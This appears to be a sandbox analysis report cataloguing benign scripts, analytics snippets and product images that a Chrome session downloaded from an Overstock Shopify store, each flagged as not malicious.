                                                                                                                                                          Preview:(function () {. const { currentScript } = document;. const script =. new URL(currentScript.src) || new URL(currentScript.getAttribute("src"));.. const appId = script.searchParams.get("appId");. const environment = script.searchParams.get("environment");.. const srcUrls = {. local: "http://localhost:3005/dist/tc-plugins.es.js", // local dev server URL defined in vite.config.js. staging:. "https://unpkg.com/tapcart-capture-kit@staging/dist/tc-plugins.es.js",. production:. "https://unpkg.com/tapcart-capture-kit@production/dist/tc-plugins.es.js",. };. const srcUrl = srcUrls[environment] || srcUrls.production;.. window["tapcartParams"] = { appId, environment };.. // Create a new script element with type module. const moduleScript = document.createElement("script");. moduleScript.type = "module";. moduleScript.src = srcUrl;. document.head.appendChild(moduleScript);.. moduleScript.onerror = function () {. console.error("The script failed to load.");. };
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (9712)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):9713
                                                                                                                                                          Entropy (8bit):5.23732542125344
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:CF19350150441264198013365BE6211E
                                                                                                                                                          SHA1:E2BCD748C1ECF1241562C48DD497F6637B30BBD3
                                                                                                                                                          SHA-256:7CAFB9BB6FF760B97BC613003ACFF5E5C35BA95067D73F690D6458DBC02A7F8B
                                                                                                                                                          SHA-512:4B8926FBD3B2272AC672A2E9165DB4C217F2669FC2F7693F220D76D3A348838669FBF2B678BE43701126318C689F5FFDED49A4227E6A9FFC8E9D5BE6B55262B8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/hooks.CY4n-DVx.js
                                                                                                                                                          Preview:import{ak as $e,dT as ue,q as I,fr as b,fs as we,ft as xe,fu as ke,fv as ce,fw as de,T as q,fx as j,cd as G,v as Ie,h as k,o as qe,z as Te,fy as Fe,cq as Ce,ff as Pe,r as ze,fz as Le,fk as De,u as Me,fA as Oe,cN as oe,p as M,fB as Ne,y as O}from"./app.CRtF78CU.js";function Re(e){const t=$e(),{geolocation:s}=ue();return I(async(n,u,d)=>{const o=await e(n,u,d);return t.histogram({name:"prediction_duration",value:o.duration.end-o.duration.start,attributes:{buyerCountry:s.country.code}}),o.data},[e,t,s.country.code])}function Ue(e){if(typeof e!="object")throw new b(`formattedAddress must be an object: received type ${typeof e}`);const t=ae(e);if(t.length)throw new b(t.join("; "));return e}function Be(e){const t=[];if(!Array.isArray(e))throw new b("An array of address suggestions must be defined");const s=e.slice(0,5);for(const[n,{id:u,label:d,matchedSubstrings:o,formattedAddress:i}]of s.entries()){if(S(d)||t.push(`label is required and must be a non-empty string: received ${typeof d} in su
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):37996
                                                                                                                                                          Entropy (8bit):7.984804043326181
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:849D57A1AE6347DDDD95643C1984D37E
                                                                                                                                                          SHA1:B29C483B8BE4379A8EDCCA6FCA1449E4BD9AA90B
                                                                                                                                                          SHA-256:FCFB4BEE2C2B7A0E2638315E193D843834BA1C1B5B3FF83BCDAB06779ACF7D46
                                                                                                                                                          SHA-512:A6F3D558723535C97F0F375D0D309C8E4DF86057953BC4E4BC77E6A580567B7A9EAC7BE66E11ED14E506AE0DC1C847A6418851BB079F72164B668C7A58EFA8A5
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/SAFAVIEH-Handmade-Cape-Cod-Pepa-Coastal-Jute-Rug_a7e5421d-6428-4959-a3cb-cc629ddd152e.jpg?v=1715133316&width=320
                                                                                                                                                          Preview:RIFFd...WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 ....M...*@.@.>5..B.!..#R...X.1D..Zd.q...p..Q..s....|.....C?..../.?.....?./...~L.............~._..p=.............k...............;....k.......P.........=.=..._............o.-....#.....?........~....g...?..........?.........?7.....W..?....(.?....[.....?....M...O.'...=H.........~@...Z.../.o.....~Z?V.;........._.?......d.........................._............o...G....M#..T......`....&.2./lQ:.......M..sD.,....}.;..;E/.n..H.....@.....+.....r.k..i?...mtFGm...._..^..........Kc.qJUX......(E.3...Vr..T.Q.4c.P`.`_.W+..9jg.k
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (3113), with CRLF line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):93597
                                                                                                                                                          Entropy (8bit):4.861861724255498
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:E056F1661A331D7A889CAE4616E416B0
                                                                                                                                                          SHA1:A9690B53A9AFF369CC263020B9720B728908B80C
                                                                                                                                                          SHA-256:0447F0875D997096262B83E30CF17897E52BA0AF4A1C62D4AD98325FD454F530
                                                                                                                                                          SHA-512:F1A9948CDEB4C7F818C5B1AF557DB550A03B961BB919927D42E471660CB5602CA3BBFE313936ECB1C6BCE2D8F923C6314A439FEF56DB0F957EC471EC2B94DC17
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/extensions/7176b64e-31ff-49da-8800-c9eec1bee9b0/kite-free-gift-discounts-368/assets/customDiscountLogic.js
                                                                                                                                                          Preview:console.log("inside customDiscount.js");....const BXGY_ICONS = {.. DISCOUNT_TAG_ICON_FILL : `<svg xmlns="http://www.w3.org/2000/svg" width="40" height="40" viewBox="0 0 40 40" fill="none">..<path fill-rule="evenodd" clip-rule="evenodd" d="M20.2835 5.83398C21.4002 5.83398 22.4502 6.26732 23.2335 7.05065L32.7502 16.5673C34.6502 18.4673 34.6502 21.534 32.7502 23.434L23.4335 32.7507C21.5168 34.6673 18.4335 34.634 16.5668 32.7507L7.05016 23.234C6.26683 22.434 5.8335 21.4007 5.8335 20.284V9.51732C5.8335 7.48398 7.4835 5.83398 9.51683 5.83398H20.2835ZM20.1002 13.6507C19.1335 12.684 17.5335 12.684 16.5668 13.6507C15.6002 14.6173 15.6002 16.2173 16.5668 17.184C17.5335 18.1673 19.1168 18.1507 20.1002 17.184C21.0668 16.2173 21.0668 14.6173 20.1002 13.6507ZM10.0002 10.834C10.0002 11.3007 10.3668 11.6673 10.8335 11.6673C11.3002 11.6673 11.6668 11.3007 11.6668 10.834C11.6668 10.3673 11.3002 10.0007 10.8335 10.0007C10.3668 10.0007 10.0002 10.3673 10.0002 10.834ZM19.9002 26.3507C20.8835 27.334 22.466
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (413), with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):413
                                                                                                                                                          Entropy (8bit):4.741783508357376
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:62A11C4C2B778F1C8FEEDA113F29E991
                                                                                                                                                          SHA1:5C36AD16A2737112C6C8B6D97D515E345BCA10A2
                                                                                                                                                          SHA-256:C0EFE50B54BB87F9DB1B93CF7F6E9AF7E107524791C55158112D293BD0F6DE1E
                                                                                                                                                          SHA-512:BF532A88C97ABA163C7F953DE58E7688AAF8BE848A307A9662759B1868AC201A30E77A6DA6D3617CA71ACE2B079E6785388F03062418593E653731B84D9D21EC
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:function reconcileEmail(i){function o(){var n=null;if(window.braze!==undefined){n=window.braze}else if(window.appboy!==undefined){n=window.appboy}return n}function t(n){const e=100;window.setTimeout(function(){if(o()!==null&&o().getUser()){n()}else{t(n)}},e)}t(function(){o().getDeviceId(function(n){var e=n;if(e==null){console.warn(`No active session, cannot set user email`)}else{o().getUser().setEmail(i)}})})}
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (1250), with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1250
                                                                                                                                                          Entropy (8bit):5.221716703189561
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:D7312AB44DC32ADD1F7621C4977BAA04
                                                                                                                                                          SHA1:FB38D676C82E7B421D4EF4468067A8A4F435F60A
                                                                                                                                                          SHA-256:F19B4F12E0421AE5D3AFA237520EFF2029AD404D4A5F8AA9C6C73373CCC00AF9
                                                                                                                                                          SHA-512:F5EBAD3A092FBCE6A493E9B55AD1443A917A431D80F77250D846039AEA5987F61648A6128BF1BA483D512E665FB748CF895CB78BF4BFF0F13B6949364AD2E438
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:(function(){function e(){var e=null;if(window.braze!==undefined){e=window.braze}else if(window.appboy!==undefined){e=window.appboy}return e}const l="reconciledCheckouts";var s=null;const o=JSON.parse(localStorage.getItem("__ui"));if(o!=null&&typeof o=="object"&&o.length>2){if(o[2]!=null&&typeof o[2]=="object"&&typeof o[2][0]=="object"){s=o[2][0]["checkoutSessionIdentifier"]}}if(s==null){return}e().getDeviceId(function(e){var o=e;if(o==null){console.warn(`Cannot reconcile checkout ${s} because Braze device ID cannot be obtained`)}else{const c=JSON.parse(localStorage.getItem(l)||"{}");const t=c[s]||null;if(t==o){return}else{c[s]=o;localStorage.setItem(l,JSON.stringify(c))}const n=new URL([...document.getElementsByTagName("script")].map(e=>e.src).find(e=>e.includes("braze-checkout-script")));const i=new URLSearchParams(n.search);const r=Object.fromEntries(i.entries());fetch("https://"+r["sdk_url"]+`/api/v3/shopify/checkout_user_reconcile?checkout_token=${s}&device_id=${o}&api_key=${r["api
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):11147
                                                                                                                                                          Entropy (8bit):7.729030729357937
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:1E5460B65262898C104373EFAFEB1EA0
                                                                                                                                                          SHA1:052F03AFEC3593EAB7371BAFC04D2E537298848C
                                                                                                                                                          SHA-256:ED7C0203ACBE0CCF78AD9301DBCE32EC343218FF3C01FE6A854D674D84E738C3
                                                                                                                                                          SHA-512:0856E14BCACF0C9C59C752B04C20454E977BA4C5A616F738E85706C09CD99708147E6BF9274D7D1B623F4BBAA909BEC912B5F311E88F35996D0C9546E6997F32
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@................................................................................................................................................................................U...-.e.L.LEL........5`.b.".+V*..,.....Q.}
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):15978
                                                                                                                                                          Entropy (8bit):7.951071952345236
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:B4BFA680764A1443C26312670E0A0838
                                                                                                                                                          SHA1:3CADCC1F342621E064B8A612AF23B100DC79BDAE
                                                                                                                                                          SHA-256:8ECEE671293F26DC32FEB074AC5AEF641521CAFD7C6D74AC4CFF0A098F99BAB9
                                                                                                                                                          SHA-512:EDC09DA940F52599CECFC83716AEF89796357B72E9ABC6E7A93D49C8BF66B200CB3C4FC24163ACD676585C7D8DCF02DBA54F71C2B1A23980DC61501AE4EB6779
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/30_22-Freestanding-Bathroom-Vanity-with-Soft-Closing-Drawers_3efa869f-ecc2-416f-876a-2705c925359b.jpg?v=1720507037&width=320
                                                                                                                                                          Preview:RIFFb>..WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .;.......*@.@.>9..D"!.... ........h.C....@vZ..$..0cS..y.g~.......J.q...3.S.........~u>._...a.../..R.%..&..E....z....?....W.#.'..3z.._...{.{y.O....z...S.o.. ?......O....`o....{B......?..................g~...g%B&..... .. *....p.V.v.~}..k..O....e&..mwY.uZa...z.:6.....6N..D.vJ....O0....;.j..2..dN..."..F..4P.Mx....;........F....Y......K.y..v=].P[G{.G..B....E...[Yu.....T.g..\..j.M....;.C...j=.....le.....$...b. nxP..N.%..Y.~...u.H$$*.|'9.h...r.U.S.@.X.......t...u....7....f......7.?....o4.Ct/.>. .......YyO....c
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):24462
                                                                                                                                                          Entropy (8bit):7.951384277180183
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:BA9541E1B52F7A58259323680F7B06B8
                                                                                                                                                          SHA1:600BA2BABCBB82DB71EA9AB779BEF33DE8187688
                                                                                                                                                          SHA-256:2081B83A62300B80F772348056C7041F66DD2444436ED4201A4ECCB3C95EEC95
                                                                                                                                                          SHA-512:61436AC1869D73E7DB5CC20A3FC08B13AEC2A1C8F4C2C9C04E0DAB51B042CFF2AAF99E95C0EA16EF48FA8B73F05AB43491AA7BA882CBCBADA7422DA55917F858
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@.............................................................................................|...zg<.....7.qr...<.).g\n=..........D....o..A....9..EvCxq...kn_.^..G......e..u3.{....c].....k5...m.yi.........d..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):33087
                                                                                                                                                          Entropy (8bit):7.9514979367203615
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:91D3A14CBEBC06232A8E092341BB75D5
                                                                                                                                                          SHA1:37DE19BD67E0131C7A68C30972885C9E6E830EC2
                                                                                                                                                          SHA-256:41999BD6BB9FDED473C84B6A227544247D2C34E6E79D75D1C767C95F42B105D5
                                                                                                                                                          SHA-512:A19A4758A4F3F8D53CC179707B0375E17E28008EECC607A3C12DB4F5FB132279122DF8CAD164773B9E503D84F282FA1EB31AF0802DE28C626E0756B444BD8F4A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@...................................................................................RB.,X(2.....3..k-..b.a..L.z9Q...Z.v.H...?.-[.7.y....... .].a..x...D.#.p....@..l...zf.-T.ZN...q....G;.z..y..[.e.......z..$./...x<..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):28943
                                                                                                                                                          Entropy (8bit):7.952701464533951
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:03B7C6F24B62DE5654AF059E07EDA65A
                                                                                                                                                          SHA1:FEA12A8FF6F242384EB86866EE313AACD2E878F3
                                                                                                                                                          SHA-256:EB28D7C7F92827F7349B0E15FEB1498BA511683135935C0209CC0727EF156A23
                                                                                                                                                          SHA-512:2C98C714F0D5CB67AB7ACCC6F0441020722FB33A086E0BBB08464A2D0B1BD0327BAF6DD48DBC85268D7CC32109AB438197F1FEA3C9B26541C7C0D1A247280BCB
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@..................................................................................L..Q.z...m./V.....E.T..N....)..$.@$.x.....V.Ey[./V<.*.E @D.Bx.7....C....&......W.K......b..[.K..X......`.!r,g.XB\s..z.V...........g
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Java source, ASCII text, with very long lines (4610)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):4611
                                                                                                                                                          Entropy (8bit):5.2585830667814095
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:FA3BDDE7040BEE7885513F6BADB61BFB
                                                                                                                                                          SHA1:31C4E0B5FF57ABC0543F35DFB2E2371EBE38B03B
                                                                                                                                                          SHA-256:EC2F568D24DD266351325046443D70FED384394DABB80F8BA31657F92D34B2EC
                                                                                                                                                          SHA-512:418F2E4DA794B187A589F4E77F722410344BFDF64C3618F25CF0869984FCDAAE809BB86413B0E7289142292160140CACBF445228CA034CF4AD19927ED67CEB26
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/Rollup.B3ludNL-.js
                                                                                                                                                          Preview:import{bO as G,a as n,bP as P,bQ as V,e as j,j as B,ad as I,aW as N,bR as M,V as p,a9 as v,bS as Q,aQ as X,h as _,A as F,q as J,D as k,bT as K,k as Y,a8 as Z,ay as nn,bU as en,b5 as ln,aa as $}from"./app.CRtF78CU.js";const tn="_7Vwjr",an="tq3Uk",sn="oNgGT",on="n5gP0",cn="wSTmt",rn="_7tqW8",dn="gxa2t",m={Summary:tn,SummaryTextContainer:an,CollapsibleContainer:sn,Button:on,Label:cn,Logo:rn,Icon:dn},y=["base","none"],w=["base","none","large200","none"];function fn({id:e,label:l,logo:c,summary:i,error:r,to:h,action:d,...t}){const o="children"in t&&G.count(t.children)>0;return"onToggle"in t&&o&&t.onToggle!==void 0&&!h&&!d?n(P.Provider,{value:!0,children:n(gn,{id:e,label:l,logo:c,summary:i,error:r,disabled:t.disabled,renderChildrenWhenCollapsed:t.renderChildrenWhenCollapsed,...t})}):n(P.Provider,{value:!0,children:n(mn,{id:e,label:l,logo:c,summary:i,to:h,action:d})})}function un({layoutStyle:e,...l}){return e==="inline"?n(N,{blockAlignment:"start",columns:["1fr","3fr","auto"],spacing:"base",
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (51384), with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):51385
                                                                                                                                                          Entropy (8bit):5.293328685395304
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:6626C1362840EBFC8F48294E8F023E18
                                                                                                                                                          SHA1:4EC0DFB37C3E536C1B5EC04B68C9846FDBAF9EEF
                                                                                                                                                          SHA-256:AABC88A6DB8B22022F96CA88E4F0A7BE426ABEF2B35169A71515A2D55246402A
                                                                                                                                                          SHA-512:B037A19B52C1047198EC7F19E99066054E454964380E2354239834260D11248E617D6759B944DDF39A25B883C8F430603D8E13097396E2DEDA9BB6905C1CD42A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:function UET(o){this.stringExists=function(n){return n&&n.length>0};this.domain="bat.bing.com";this.domainCl="bat.bing.net";this.URLLENGTHLIMIT=4096;this.pageLoadEvt="pageLoad";this.customEvt="custom";this.pageViewEvt="page_view";o.Ver=o.Ver!==undefined&&(o.Ver==="1"||o.Ver===1)?1:2;this.uetConfig={};this.uetConfig.consent={enabled:!1,adStorageAllowed:!0,adStorageUpdated:!1,hasWaited:!1,waitForUpdate:0,enforced:!1};this.uetConfig.tcf={enabled:!1,vendorId:1126,hasLoaded:!1,timeoutId:null,gdprApplies:undefined,adStorageAllowed:undefined,measurementAllowed:undefined,personalizationAllowed:undefined};this.uetConfig.cusig={hasLoaded:!1,timeoutId:null,blob:{}};this.beaconParams={};this.supportsCORS=this.supportsXDR=!1;this.paramValidations={string_currency:{type:"regex",regex:/^[a-zA-Z]{3}$/,error:"{p} value must be ISO standard currency code"},number:{type:"num",digits:3,max:999999999999},integer:{type:"num",digits:0,max:999999999999},hct_los:{type:"num",digits:0,max:30},date:{type:"regex",
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (1957)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2054
                                                                                                                                                          Entropy (8bit):5.084777270082659
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:9A9D3523ECB240AF4D4FBD0A63C010F0
                                                                                                                                                          SHA1:704753BD852A71B9F7ADC80764AB65A97D5B7714
                                                                                                                                                          SHA-256:DC1E09FE80316817038DE87A6E4C6C0B28B924068AAB96503F269A148EC37FAC
                                                                                                                                                          SHA-512:9458506B8B3447B4AFF2CC7E1EA81F1957E450B309708EEBCA9BED4D199F69732022E23E0EC0F45F7767F27719B66C657CF45D41EBFCCAD7C64DB72E299BE5FD
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/t/211/assets/gtag-events.js?v=113738939431907924651729142870
                                                                                                                                                          Preview:function createGtagEvents(elements=[],action="click",name="event_name"){window.gtag||console.error("GA4 events could not be established");for(const el of elements)el?.addEventListener(action,function(e){if(name==="header_nav_click"){const textContent=el.innerText.trim();gtag("event",name,{value:textContent})}else gtag("event",name)})}const selectors=[{selector:"store-header a",eventName:"header_nav_click"},{selector:"#cart-icon",eventName:"mini_cart_toggle"},{selector:'button[name="checkout"]',eventName:"begin_checkout"},{selector:"details-disclosure:has(.product-description)",eventName:"product_description_click"},{selector:"media-gallery img",eventName:"product_image_click"},{selector:"details-disclosure:has(#pr-reviewdisplay)",eventName:"reviews_click"}];for(const s of selectors){const el=document.querySelectorAll(s.selector);createGtagEvents(el,"click",s.eventName)}document.querySelectorAll('form:has(input[type="email"])').forEach(emailInput=>{emailInput.addEventListener("submit",e
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):18
                                                                                                                                                          Entropy (8bit):3.4193819456463714
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:C07FE8D0C031632D49B937F7B64CC318
                                                                                                                                                          SHA1:B50FF5D4241ED1D437505098707C289683F62ACF
                                                                                                                                                          SHA-256:9B5179EA2A77FE69B294FBD2ED504EACBFBE048EDE58967B43AF2CA537144B1F
                                                                                                                                                          SHA-512:394C5DA339B99343711A35BCF088CB6EA5E93462616B6E5A2085182F55B63206ADA99E4A429B332170F958F2ACBEB57B9623AF1B96CEA288E34BCDE693541723
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://shop.app/pay/session?v=1&token=63b04998-ca6e-4cc2-964f-8986a7867206&shop_id=63371051167
                                                                                                                                                          Preview:{"eligible":false}
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 650x650, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):126327
                                                                                                                                                          Entropy (8bit):7.972171360076844
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:EC950D98DD588EE7DDF899E19B640ADF
                                                                                                                                                          SHA1:11AC7377AEC9750AD361C77C860796D06FEFBE16
                                                                                                                                                          SHA-256:B5F2AF1287339E9BD58014271B1BFABFB0B2CDBC30E6D063DB44B4A3D04A3682
                                                                                                                                                          SHA-512:6C6AFD7CB0297807777B9C805663650C351D1A259070BE78B86A102BFA89CADE1E1DFA14F62A42A52916EF84DFB80C388B7AF312DD1D96BB838C66932D7B3722
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100............................................ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}...............................................................................................#jg+P.Zj..&6V....0.....2...!.p&.u.CW.......k.......].Y.....UJ-.q."G.P....K.B..........................}{..........F0.......D..0 .
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (30343)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):30344
                                                                                                                                                          Entropy (8bit):4.71081887626325
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:36082410DF2EF7F83932219089DC1443
                                                                                                                                                          SHA1:7961402D7D01E19387FE609A38454B0BC8C6CCA4
                                                                                                                                                          SHA-256:5B9573E1023DA775390E9284EC0EB1C606DF9B468A28980055B4A6AA804F4350
                                                                                                                                                          SHA-512:806FF5B14991E42523541D89A18EB295C4BC3DD7C7E9895068EF083A898DBE928D3852638CF106D0A646617E773CA2084B439659B41B3125B7E4FCA1D2D81FB1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://use.fontawesome.com/releases/v4.7.0/css/font-awesome-css.min.css
